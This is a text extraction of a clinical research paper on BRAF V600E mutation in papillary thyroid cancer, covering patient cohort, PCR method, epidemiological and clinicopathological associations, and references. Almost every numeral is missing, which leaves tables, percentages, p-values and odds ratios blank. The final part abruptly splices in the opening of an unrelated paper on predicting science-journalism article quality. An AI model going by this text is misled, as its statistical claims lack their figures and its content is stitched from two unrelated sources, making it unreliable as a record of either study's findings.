advanced stage disease. introduction thyroid cancer, especially papillary subtype, is the most common malignancy in the endocrine system ( ). papillary thyroid cancer (ptc) can be further classified into conventional variant (cptc), follicular variant (fvptc) and other rare variants ( ). despite ptc is usually a well-differentiated thyroid carcinoma with a favorable prognosis, its incidence has been sharply rising in many countries over the last decades ( ) (the average incidence in the usa was . % from to and . % from to ( )). in addition, recurrence and metastases are common for a small proportion of ptcs who reach advanced disease stages ( ). in recent years, molecular markers have received extensive attention to improving risk stratification of ptc ( ). braf is the main subtype of raf kinase and plays a key role in tumorigenesis. the mutation of braf v e - - key words f papillary thyroid cancer f braf v e f epidemiological features f clinicopathological features endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:lingruiaoxue@ .com mailto:ting_w @ .com https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c yan, m huang et al. braf v e mutation in ptc pb– : could trigger tumorigenesis through constitutively activating mapk pathway ( ). as the most common mutation observed in ptc, braf v e has received special attention in various ethnic populations since this protein kinase may contribute to cell proliferation, growth and division. however, due to the limited large cohort evidence, the function of braf v e as a biomarker in driving aggressiveness in ptc continues debatable ( , ). the majority of researches claimed that braf v e mutation was associated with poor clinicopathologic outcomes in patients with ptc, such as large tumor size, lymph node metastases, advanced clinical stages and recurrence ( , ). by contrast, several studies suggested that braf v e mutation had no significant association with clinical stage, multicentricity or recurrence ( , ). these equivocal findings have hindered the fact that whether the mutation had an impact on aggressive behavior of ptc. furthermore, most researches have focused on the relationship between mutation and clinicopathological characteristics, but the epidemiologic factors related to braf v e mutations were rarely studied in previous researches. here, we investigated epidemiological characteristics that may be associated with the mutation of braf v e and then studied the role of braf v e mutation in the clinicopathological features of ptc. patients and methods patient identification and clinicopathologic data collection this study included patients ( women and men) age . ± .   years (mean ± s.d.) who were diagnosed with ptc and underwent surgery between january and july at the department of the thyroid, breast and vascular surgery in xijing hospital. these patients were clinically observed with mean follow-up time of .  months (range –  months) after the initial treatments. all these patients were regularly followed with physical examinations, thyroid function tests and neck ultrasonography every –  months after the initial surgery. if suspicious or indeterminate thyroid nodules or lymph nodes were found, ultrasound-guided fine-needle aspiration cytology (us-fnac) was used for evaluation. between january and july , patients were diagnosed with thyroid cancer. among these, patients ( . %) were diagnosed with ptc, and patients ( . %) were diagnosed with other types of thyroid carcinoma. ptc patients without braf v e status or lost to follow-up were excluded. the flow diagram of patient included was shown in fig.  . after institutional review board approval and informed patient consenting, we retrospectively collected detailed braf v e and clinicopathologic data from institutional patient records. the epidemiological data and clinicopathological features were summarized in tables  and , respectively. patients with alcohol history was defined as patients who drinking more than twice a month and lasting more than   year. patients with smoking history was defined as patients who had a current or past smoking history of ≥  months. tumor node metastasis (tnm) stages were defined based on the seventh edition of the american joint committee on cancer (ajcc) staging system. persistent or recurrent disease was defined as the presence of a structural abnormality confirmed by cytological or surgical pathology after the initial surgery. the braf v e mutation results had no influence on the treatment decision making. figure  flow diagram of patient included according to the inclusion and exclusion criteria. patients diagnosed with thyroid carcinoma excluded follicular thyroid cancer medullary thyroid cancer anaplastic thyroid cancer papillary thyroid carcinoma excluded was short of braf v e mutational results was lost follow-up care not providing complete epidemiological and clinicopathological features patients were included in this study this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c yan, m huang et al. braf v e mutation in ptc : mutational analyses braf v e mutational analyses were performed by pathologists after surgical treatments of patients. dna was isolated from formalin-fixed, paraffin-embedded (ffpe) tissue blocks by sds-proteinase k method and subjected to amplification refractory mutation system (arms)- real-time pcr for the detection of braf v e mutations. dna was extracted from each sample via a commercial kit (ffpe dna reagent, cat no. adx-ff ) according to the manufacturer’s instructions. typically, μm sections ( – pieces) were carefully micro-dissected from ffpe tissue blocks. the sections were initially treated with . ml xylene/ethanol three times, then digested during an overnight incubation with μl proteinase k solution and μl buffer dtl in a °c rotating incubator, and dna purification was performed through qiagen columns, according to the manufacturer’s instructions. then, the most common t a transversion (braf v e) mutation was studied. the pcr was used to amplify exon of the braf gene, which was detected by braf v mutations detection kit (applied by adx-br , amoydx company, china) according to the manufacturer’s instructions. pcr primer sequences were as follows: table  association of braf v e with epidemiologic features of all ptc. braf v e mutation (−) braf v e mutation (+) χ p valueno. (%) no. (%) total no. of cases ( . ) ( . ) age at diagnosis  ≤ ( . ) ( . ) . < .  > ( . ) ( . ) sex  male ( . ) ( . ) . .  female ( . ) ( . ) family history of cancer  had any family member(s) with history of cancer ( . ) ( . ) . .  none ( . ) ( . ) presence of history of cancer  had any other cancer ( . ) ( . ) . .  none ( . ) ( . ) presence of smoking history  ever ( . ) ( . ) . .  never ( . ) ( . ) presence of alcohol history  ever ( . ) ( . ) . .  never ( . ) ( . ) concomitant diabetes  yes ( . ) ( . ) . .  no ( . ) ( . ) concomitant hypertension  yes ( . ) ( . ) . < .  no ( . ) ( . ) concomitant benign thyroid diseases  hyperthyroid   yes ( . ) ( . ) / .   no ( . ) ( . )  nodular goiter   yes ( . ) ( . ) . .   no ( . ) ( . )  ht   yes ( . ) ( . ) . < .   no ( . ) ( . ) the chi-square test (χ test) or, for small cell sizes, fisher’s exact test was employed to examine the significance of association between braf v e and epidemiologic features. p value < . was treated as statistically significant. bold indicates statistical significance. ‘/’ means no χ value because cell sizes were small and fisher’s exact test was employed. ‘%’ is the proportion of patients with or without braf v e mutations in the subgroup of patients. ht, hashimoto thyroiditis. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c yan, m huang et al. braf v e mutation in ptc pb– : forward primer, tctgtagcagccctcagtagcgaagca gtgattttggtctagctacaga; reverse primer, agc cctcagtagcgaagcaactcagcagcatctcagg. braf gene reactions were performed in a final volume of μl using as template – ng of genomic dna, with × buffer including pmol forward primer, pmol reverse primer, . pmol dntps, pmol mgcl , mutant probe pmol and unit of taq polymerase. each reaction included a positive and a negative control sample, and in negative sample, dna template was substituted by water. pcr recycling started with initial denaturation step at °c for min, followed by cycles of denaturation ( °c, s), annealing ( °c, s) and extension ( °c, s) and a last step of min extension at °c. pcr efficiency was determined by measuring the ct value of fam signal. table  relationship of braf v e with clinicopathological features of all ptc. braf v e mutation (−) braf v e mutation (+) χ p valueno. (%) no. (%) total no. of cases ( . ) ( . ) surgery  lobectomy ( . ) ( . ) . .  total thyroidectomy ( . ) ( . ) histological type  cptc ( . ) ( . ) / < .  fvptc ( . ) ( . ) tumor size  ≤  cm ( . ) ( . ) . .  >  cm ( . ) ( . )  median (quartile), cm . ( . – . ) . ( . – . ) lesions  unilateral ( . ) ( . ) . .  bilateral ( . ) ( . ) extrathyroidal invasion  yes ( . ) ( . ) . .  no ( . ) ( . ) vascular invasion  yes ( . ) ( . ) . .  no ( . ) ( . ) status of lymph node metastasesa  yes ( . ) ( . ) . .  no ( . ) ( . ) site of lymph node metastases  only central ( . ) ( . ) . < .  only lateral ( . ) ( . )  central and lateral ( . ) ( . ) disease stage ( th edition)b  i + ii ( . ) ( . ) . .  iii + iv ( . ) ( . ) distant metastatic  yes ( . ) ( . ) / .  no ( . ) ( . ) persistent or recurrent disease  yes ( . ) ( . ) . .  no ( . ) ( . ) the chi-square test (χ test) or, for small cell sizes, fisher’s exact test was employed to examine the significance of association between braf v e and clinicopathological features. p value < . was treated as statistically significant. bold indicates statistical significance. tumor size was summarized with medians (quartile). ‘/’means no χ value because cell sizes were small and fisher’s exact test was employed. ‘%’ is the proportion of patients with or without braf v e mutations in the subgroup of patients. ‘a’ means there are missing cases in ‘status of lymph node metastases’. in patients without braf v e mutations, patients had undetermined lymph node metastasis status. in patients with braf v e mutations, patients had undetermined lymph node metastasis status. ‘b’ means there are missing cases in ‘disease stage’. in patients without braf v e mutations, the disease stage of three patients cannot be determined. in patients with braf v e mutations, the disease stage of patients cannot be determined. cptc, conventional papillary thyroid carcinoma; fvptc, follicular variant papillary thyroid carcinoma. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c yan, m huang et al. braf v e mutation in ptc : statistical analyses data related to histologic characteristics, patient epidemiological data and clinical outcomes were collected. categorical data were summarized with frequencies and percentages. continuous data were summarized with means ± standard deviations (if it is a normal distribution) or medians and quartile (if it is not a normal distribution). the chi-square test (χ test) or, for small cell sizes, fisher’s exact test was employed to examine categorical variables. all p values were two-sided, and a p value < . was treated as statistically significant. pooled ors with their corresponding % confidence intervals ( % cis) were calculated to assess the relationship between braf v e mutation and clinicopathological features. all statistical analyses were conducted by the software of spss with version . . results braf v e mutation in ptc there were patients included in the study with an average age of . ± . (range – ), and . % of the patients were female ( women and men). braf v e mutation was found in of ( . %) cptcs, and of ( . %) fvptcs, with an overall prevalence of . % ( of ). no significant difference of braf v e mutation was observed in female and male patients (p = . ). with regard to ages, significant difference of braf v e incidence was found between patients aged ≤ and >   years ( . vs . %, p < . ). to further investigate the influence of age on mutational incidence, we divided all patients into children/adolescent group (≤   years) and adults groups of various age ranges ( – , – , – , >   years old). as shown in fig.  , patients were more prone to be braf v e positive with the growth of age. association of braf v e and epidemiological features in ptcs to identify epidemiological factors associated with braf v e mutation, the relationship between epidemiological features and the mutation was investigated. in the univariate analysis of ptcs (table  ), the presence of braf v e mutation was found to be significantly associated with several epidemiological features, including age at diagnosis, family history of cancer, concomitant diabetes, hypertension and hashimoto thyroiditis (ht). the incidence of braf v e mutations in patients with family cancer history was higher than that in patients without family history of cancer ( . vs . %, p = . ). interestingly, patients with diabetes or hypertension presented higher mutation rates than those who did not have diabetes or hypertension ( . vs . %, p = . ; . vs . %, p < . ). conversely, the patients concomitant of ht displayed less braf v e mutations than patients without ht ( . vs . %, p < . ). similarly, patients with hyperthyroid or nodular goiter showed lower mutation frequency than those who did not have hyperthyroid or nodular goiter, but the association was insignificant. except the factors mentioned above, no significant association was found between the presence of braf v e mutation and other features including gender, presence of history of cancer, presence of smoking and alcohol history. relationship of braf v e and clinicopathological features in ptcs in the univariate analysis of all ptcs (table  ), the presence of braf v e was found to be significantly associated with small tumor size (p = . ), bilateral multifocality (p = . ), less central and lateral lymph node metastases simultaneously (p < . ) and advanced disease stage (iii and iv) (p = . ). although there was no significant association, less braf v e mutation was found in patients with lymph node metastases than patients without lymph node metastases ( . vs . %, p = . ). furthermore, it was worth noticing that less braf v e presented in patients with aggressive lymph node metastases (central and lateral metastases at the same time) than patients with only central or only lateral lymph node metastases ( . vs . % or . %, p < . ). no significant association was found between braf . % . % . % . % . % . % ≤ - - - braf v e (+) braf v e (-) figure  the correlation between the presence of the braf v e mutation and the age of patients at the time of diagnosis. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c yan, m huang et al. braf v e mutation in ptc pb– : v e mutation and another high-risk clinicopathologic characteristics, such as extrathyroidal invasion (p = . ), vascular invasion (p = . ), distant metastatic (p = . ) and ptc persistence or recurrence (p = . ). multivariate logistic regression analysis of braf v e mutation in ptcs to further confirm the relationship between braf v e and epidemiological or clinicopathological features, multivariate logistic regression analysis was performed (table  ). the results showed that age (p = . , or = . , % ci = . – . ), concomitant hypertension (p = . , or = . , % ci = . – . ) and lesions (p = . , or = . , % ci = . – . ) were positive independent factors for braf v e mutation. in contrast, concomitant ht (p < . , or = . , % ci = . – . ) and lateral lymph node metastases (p < . , or = . , % ci = . – . ) were negative independent factors for braf v e mutation. after adjustment for patients’ age and sex, the association between braf v e mutation and disease stage was not statistically significant (p = . , or = . , % ci = . – . ). discussion this study sought to find the epidemiological factors associated with braf v e mutation and clarify the relationship between braf v e mutation and clinical outcomes in ptc. previously, the braf v e mutation has been reported as an aggressive prognosis in ptc, although a large cohort study was inadequate and there have been noteworthy inconsistencies in some studies ( , ). in our analysis, we found a lack of table  multivariate logistic regression analysis of braf v e mutation of all ptc. braf v e mutation (n, %) p value or % ci− + age at diagnosis .  ±  . .  ±  . . . . – . sex . . . – .  male ( . %) ( . %)  female ( . %) ( . %) family history of cancer . . . – .  had any family member(s) with history of cancer ( . %) ( . %)  none ( . %) ( . %) concomitant diabetes . . . – .  yes ( . %) ( . %)  no ( . %) ( . %) concomitant hypertension . . . – .  yes ( . %) ( . %)  no ( . %) ( . %) concomitant ht < . . . – .  yes ( . %) ( . %)  no ( . %) ( . %) tumor size . ( . – . ) . ( . – . ) . . . – . lesions . . . – .  unilateral ( . %) ( . %)  bilateral ( . %) ( . %) site of lymph node metastasis  central ( . %) ( . %) . . . – .  lateral ( . %) ( . %) < . . . – . disease stage ( th edition)a . . . – .  i + ii ( . %) ( . %)  iii + iv ( . %) ( . %) age at diagnosis was summarized with means ± standard deviations. tumor size was summarized with medians (quartile). multivariate logistic regression analysis was employed to identify risk factors for braf v e mutations. p value < . was treated as statistically significant. bold indicates statistical significance. ‘%’ is the proportion of patients with or without braf v e mutations in the subgroup of patients. ‘a’ means there are missing cases in ‘disease stage’. in patients without braf v e mutations, the disease stage of three patients cannot be determined. in patients with braf v e mutations, the disease stage of patients cannot be determined. ht, hashimoto thyroiditis; or, odds ratio; % ci, % confidence interval. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c yan, m huang et al. braf v e mutation in ptc : correlation between braf v e mutation and either aggressive clinicopathological features or persistent or recurrent disease. the incidence of braf v e mutation increased in recent years, it seems that braf v e mutation gradually become the accompanying phenomenon for ptc patients. mingzhao xing et al. reported braf v e rate of . % in patients between and ( ). in , electron et  al. reported the prevalence of braf v e was . % ( ). in , kurtulmus et al. showed braf v e mutation rate of . % in ptcs ( ). the meta-analysis showed braf v e mutations occurred in . % of ptcs (update to august, ) ( ). in , kim et  al. reported braf v e mutations were presented in . % ptc patients ( of ) ( ), and we found the similar mutation rate in our sample. compared to previous researches, we update braf v e mutation data from to . the reason why mutation prevalence in our study is higher than the average may ascribe to population aging in recent years and different research methodology. in this study, the braf v e mutations were tested from the postoperative tissue samples using the arms- real- time pcr method, which was more sensitive and robust at detecting braf v e somatic mutations than dna sequencing on clinical samples ( ). our study indicated that older age and concomitant hypertension were independent risk factors of braf v e mutation. on the contrary, concomitant ht was an independent protective factor of the mutation. despite being insignificant after multivariate adjustment, the presence of family history of cancer was associated with higher braf v e mutation incidence in the univariate analysis, which were in agreement with the data reported in previous study ( ). in addition, with the large size of this study, negative correlation between ht and braf v e mutation was demonstrated, which was confirmed in a recent smaller study ( ). potential mechanisms and immunological link that might lead to the synchronous appearance of ht and ptc had been investigated ( , ). if there is more clinical evidence, the correlation between braf v e and family history of cancer, hypertension and ht may help to promote the investigation of braf v e mutation mechanism. as for the factor of age, plenty of researches had found that incidence of braf v e was higher in patients >   years old ( , ), but few studies found the positive correlation between braf v e and age (fig.  ). compared to adults, ptc in pediatric and adolescents presents more lymph node metastases, distant metastases and recurrence ( , ). combining the study mentioned above, the phenomenon that less number of braf v e mutations appears in patients aged under   years suggested that aggressive features displayed in these patients may not be caused by braf v e mutation. the aggressive role of braf v e mutations has been widely investigated in previous studies ( , , ). however, our results did not show that braf v e mutation is a biomarker in driving aggressiveness. given the high and increased prevalence of braf v e mutation in recent years ( . %, on average, in the meta-analysis mentioned above ( ), and . % in our study), and the oppositely indolent behavior, the rarity recurrence and mortality of ptc ( and %, respectively) ( , ), an absence of association between braf v e mutation, and these negative events seem logical. in univariate analyses, braf v e mutations were significantly associated with smaller tumor, bilateral multifocality, advanced disease stage and less aggressive lymph node metastases in ptcs. advanced tnm stage showed insignificant after multivariate adjustment. therefore, bilateral multifocality seems to be the only risk factor associated with braf v e. notably, a recent study showed tumor multifocality has no independent risk prognostic value in outcomes of ptc ( ). other classic risk factors ( ), such as extrathyroidal extension, distant metastases and disease recurrence, were insignificantly associated with braf v e mutation. therefore, presence of braf v e is not an aggressive role associated with poor clinicopathologic outcomes in ptc. a recent publication has called into question the relationship of braf v e mutation and prognosis in ptc. in the analysis of patients with braf v e mutation, henke et  al. found the mutation is not predictive of long-term outcome in ptc ( ). although the presence of braf v e mutation is not an aggressive prognosis on poor clinical outcomes, surgery strategy and treatment guided by the presence of the mutation may be available. such therapies might include determining surgery extent and the use of braf inhibitors. the association between braf v e and bilateral lesions and less lateral lymph node metastases was found in our study. if there is more clinical evidence in the future, the status of braf v e mutation may be considered as one of the factors for determining the surgery extent besides tumor size, extrathyroidal extension, vascular invasion, lymph node size and willingness of patients ( ). furthermore, considerable patients with braf v e mutation will have recurrence since a majority of ptc patients in our cohort ( . %) had the mutation. we propose that high-risk patients with braf v e this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c yan, m huang et al. braf v e mutation in ptc pb– : mutation use braf inhibitors, such as sorafenib, lenvatinib and vemurafenib. those patients might benefit from the targeted therapy, which (sorafenib and lenvatinib) have been approved for metastatic ptc ( ). the greatest strengths of this study are its consecutive large cohort ( ptc patients) and its latest research time (from to ). the limitations of this study were as follows. first, a selection bias could occur in this retrospective unicentral research. the large consecutive cohort of patients may help minimize the bias. second, follow-up time was short in this study (mean .  months, range, –   months). and research on the mechanism of epidemiological features associated with braf v e mutation in ptcs should be carried out in the future. in summary, this was a large consecutive retrospective study that investigated the relationship of braf v e mutation with epidemiological and clinicopathological features. older age and concomitant hypertension were independent risk factors of braf v e mutation. concomitant ht was an independent protective factor for the braf v e expression. bilateral multifocality was the only risk factor associated with braf v e but a recent study showed it has no independent risk prognostic value in outcomes of ptc. other poor clinicopathological features were insignificantly associated with the mutation. although the presence of braf v e mutation is not an aggressive prognosis on poor clinical outcomes, surgery and treatment guided by the presence of the mutation may be available. declaration of interest the authors declare that there is no conflict of interest that could be perceived as prejudicing the impartiality of the research reported. funding the authors would like to acknowledge support from the national natural science foundation of china (no. ). ethical approval consent has been obtained from each patient after full explanation of the purpose and nature of all procedures used. the study was approved by an independent ethics committee of xijing hospital (first affiliated hospital of fourth military medical university). references pacini f & castagna mg. approach to and treatment of differentiated thyroid carcinoma. medical clinics of north america – . (https://doi.org/ . /j.mcna. . . ) pellegriti g, frasca f, regalbuto c, squatrito s & vigneri r. worldwide increasing incidence of thyroid cancer: update on epidemiology and risk factors. journal of cancer epidemiology . (https://doi.org/ . / / ) jung ck, little mp, lubin jh, brenner av, wells sa, jr, sigurdson aj & nikiforov ye. the increase in thyroid cancer incidence during the last four decades is accompanied by a high frequency of braf mutations and a sharp increase in ras mutations. journal of clinical endocrinology and metabolism e –e . (https://doi. org/ . /jc. - ) vuong hg, altibi am, abdelhamid ah, ngoc pu, quan vd, tantawi my, elfil m, vu tl, elgebaly a, oishi n, et al. the changing characteristics and molecular profiles of papillary thyroid carcinoma over time: a systematic review. oncotarget – . (https://doi.org/ . /oncotarget. ) nikiforov ye & nikiforova mn. molecular genetics and diagnosis of thyroid cancer. nature reviews: endocrinology – . (https://doi.org/ . /nrendo. . ) zhang q, liu sz, zhang q, guan yx, chen qj & zhu qy. meta- analyses of association between braf(v e) mutation and clinicopathological features of papillary thyroid carcinoma. cellular physiology and biochemistry – . (https://doi. org/ . / ) henke le, pfeifer jd, ma c, perkins sm, dewees t, el-mofty s, moley jf, nussenbaum b, haughey bh, baranski tj, et al. braf mutation is not predictive of long-term outcome in papillary thyroid carcinoma. cancer medicine – . (https://doi. org/ . /cam . ) tufano rp, teixeira gv, bishop j, carson ka & xing m. braf mutation in papillary thyroid cancer and its value in tailoring initial treatment: a systematic review and meta- analysis. medicine – . (https://doi.org/ . / md. b e a c ) xing m, westra wh, tufano rp, cohen y, rosenbaum e, rhoden kj, carson ka, vasko v, larin a, tallini g, et al. braf mutation predicts a poorer clinical prognosis for papillary thyroid cancer. journal of clinical endocrinology and metabolism – . (https:// doi.org/ . /jc. - ) kim th, park yj, lim ja, ahn hy, lee ek, lee yj, kim kw, hahn sk, youn yk, kim kh, et al. the association of the braf(v e) mutation with prognostic factors and poor clinical outcome in papillary thyroid cancer: a meta-analysis. cancer – . (https://doi.org/ . /cncr. ) walczyk a, kowalska a, kowalik a, sygut j, wypiorkiewicz e, chodurska r, pieciak l & gozdz s. the braf(v e) mutation in papillary thyroid microcarcinoma: does the mutation have an impact on clinical outcome? clinical endocrinology – . (https://doi.org/ . /cen. ) nam jk, jung ck, song bj, lim dj, chae bj, lee ns, park wc, kim js, jung ss & bae js. is the braf(v e) mutation useful as a predictor of preoperative risk in papillary thyroid cancer? american journal of surgery – . (https://doi.org/ . /j. amjsurg. . . ) russo m, malandrino p, nicolosi ml, manusia m, marturano i, trovato ma, pellegriti g, frasca f & vigneri r. the braf(v e) mutation influences the short- and medium-term outcomes of classic papillary thyroid cancer, but is not an independent predictor of unfavorable outcome. thyroid – . (https://doi. org/ . /thy. . ) gandolfi g, sancisi v, piana s & ciarrocchi a. time to re-consider the meaning of braf v e mutation in papillary thyroid carcinoma. international journal of cancer – . (https://doi. org/ . /ijc. ) xing m, liu r, liu x, murugan ak, zhu g, zeiger ma, pai s & bishop j. braf v e and tert promoter mutations cooperatively identify the most aggressive papillary thyroid cancer with highest recurrence. journal of clinical oncology – . (https:// doi.org/ . /jco. . . ) this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /j.mcna. . . https://doi.org/ . / / https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /oncotarget. https://doi.org/ . /nrendo. . https://doi.org/ . / https://doi.org/ . / https://doi.org/ . /cam . https://doi.org/ . /cam . https://doi.org/ . /md. b e a c https://doi.org/ . /md. b e a c https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /cncr. https://doi.org/ . /cen. https://doi.org/ . /j.amjsurg. . . https://doi.org/ . /j.amjsurg. . . https://doi.org/ . /thy. . https://doi.org/ . /thy. . https://doi.org/ . /ijc. https://doi.org/ . /ijc. https://doi.org/ . /jco. . . https://doi.org/ . /jco. . . https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c yan, m huang et al. braf v e mutation in ptc : kebebew e, weng j, bauer j, ranvier g, clark oh, duh qy, shibru d, bastian b & griffin a. the prevalence and prognostic value of braf mutation in thyroid cancer. annals of surgery – ; discussion – . (https://doi.org/ . / sla. b e d) kurtulmus n, duren m, ince u, cengiz yakicier m, peker o, aydin o, altiok e, giray s, azizlerli h. braf(v e) mutation in turkish patients with papillary thyroid cancer: strong correlation with indicators of tumor aggressiveness. endocrine – . (https://doi.org/ . /s - - -x) kim sk, woo jw, lee jh, park i, choe jh, kim jh & kim js. chronic lymphocytic thyroiditis and braf v e in papillary thyroid carcinoma. endocrine-related cancer – . (https://doi. org/ . /erc- - ) ellison g, donald e, mcwalter g, knight l, fletcher l, sherwood j, cantarini m, orr m & speake g. a comparison of arms and dna sequencing for mutation analysis in clinical biopsy samples. journal of experimental and clinical cancer research . (https://doi. org/ . / - - - ) zhang q, song f, zheng h, zhu x, song f, yao x, zhang l & chen k. association between single-nucleotide polymorphisms of braf and papillary thyroid carcinoma in a chinese population. thyroid – . (https://doi.org/ . /thy. . ) zeng rc, jin lp, chen ed, dong sy, cai yf, huang gl, li q, jin c, zhang xh & wang oc. potential relationship between hashimoto’s thyroiditis and braf(v e) mutation status in papillary thyroid cancer. head and neck (supplement ) e –e . (https://doi.org/ . /hed. ) ehlers m & schott m. hashimoto’s thyroiditis and papillary thyroid cancer: are they immunologically linked? trends in endocrinology and metabolism – . (https://doi.org/ . /j. tem. . . ) boi f, pani f & mariotti s. thyroid autoimmunity and thyroid cancer: review focused on cytological studies. european thyroid journal – . (https://doi.org/ . / ) spinelli c, rossi l, piscioneri j, strambi s, antonelli a, ferrari a, massimino m & miccoli p. pediatric differentiated thyroid cancer: when to perform conservative and radical surgery. current pediatric reviews – . (https://doi.org/ . / ) al-qurayshi z, hauch a, srivastav s, aslam r, friedlander p & kandil e. a national perspective of the risk, presentation, and outcomes of pediatric thyroid cancer. jama otolaryngology: head and neck surgery – . (https://doi.org/ . / jamaoto. . ) xing m, alzahrani as, carson ka, shong yk, kim ty, viola d, elisei r, bendlova b, yip l, mian c, et al. association between braf v e mutation and recurrence of papillary thyroid cancer. journal of clinical oncology – . (https://doi.org/ . / jco. . . ) xing m, alzahrani as, carson ka, viola d, elisei r, bendlova b, yip l, mian c, vianello f, tuttle rm, et al. association between braf v e mutation and mortality in patients with papillary thyroid cancer. jama – . (https://doi.org/ . / jama. . ) wang f, yu x, shen x, zhu g, huang y, liu r, viola d, elisei r, puxeddu e, fugazzola l, et al. the prognostic value of tumor multifocality in clinical outcomes of papillary thyroid cancer. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) haugen br, alexander ek, bible kc, doherty gm, mandel sj, nikiforov ye, pacini f, randolph gw, sawka am, schlumberger, et al. american thyroid association management guidelines for adult patients with thyroid nodules and differentiated thyroid cancer: the american thyroid association guidelines task force on thyroid nodules and differentiated thyroid cancer. thyroid – . (https://doi.org/ . /thy. . ) wang ts & sosa ja. thyroid surgery for differentiated thyroid cancer – recent advances and future directions. nature reviews: endocrinology – . (https://doi.org/ . /s - - - ) brose ms, nutting cm, jarzab b, elisei r, siena s, bastholt l, de la fouchardiere c, pacini f, paschke r, shong yk, et al. sorafenib in radioactive iodine-refractory, locally advanced or metastatic differentiated thyroid cancer: a randomised, double-blind, phase trial. lancet – . (https://doi.org/ . /s - ( ) - ) received in final form june accepted june accepted preprint published online june this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /sla. b e d https://doi.org/ . /sla. b e d https://doi.org/ . /s - - -x https://doi.org/ . /erc- - https://doi.org/ . /erc- - https://doi.org/ . / - - - https://doi.org/ . / - - - https://doi.org/ . /thy. . https://doi.org/ . /hed. https://doi.org/ . /j.tem. . . https://doi.org/ . /j.tem. . . https://doi.org/ . / https://doi.org/ . / https://doi.org/ . / https://doi.org/ . /jamaoto. . https://doi.org/ . /jamaoto. . https://doi.org/ . /jco. . . https://doi.org/ . /jco. . . https://doi.org/ . /jama. . https://doi.org/ . /jama. . https://doi.org/ . /jc. - https://doi.org/ . /thy. . https://doi.org/ . /s - - - https://doi.org/ . /s - ( ) - https://doi.org/ . /s - ( ) - https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com abstract introduction patients and methods patient identification and clinicopathologic data collection mutational analyses statistical analyses results braf v e mutation in ptc association of braf v e and epidemiological features in ptcs relationship of braf v e and clinicopathological features in ptcs multivariate logistic regression analysis of braf v e mutation in ptcs discussion declaration of interest funding ethical approval references what makes writing great? first experiments on article quality prediction in the science journalism domain annie louis university of pennsylvania philadelphia, pa lannie@seas.upenn.edu ani nenkova university of pennsylvania philadelphia, pa nenkova@seas.upenn.edu abstract great writing is rare and highly admired. readers seek out articles that are beautifully written, informative and entertaining. yet information-access technologies lack capabil- ities for predicting article quality at this level. in this paper we present first experiments on article quality prediction in the science jour- nalism domain. we introduce a corpus of great pieces of science journalism, along with typical articles from the genre. we imple- ment features to capture aspects of great writ- ing, including surprising, visual and emotional content, as well as general features related to discourse organization and sentence structure. we show that the distinction between great and typical articles can be detected fairly ac- curately, and that the entire spectrum of our features contribute to the distinction. introduction measures of article quality would be hugely bene- ficial for information retrieval and recommendation systems. in this paper, we describe a dataset of new york times science journalism articles which we have categorized for quality differences and present a system that can automatically make the distinction. science journalism conveys complex scientific ideas, entertaining and educating at 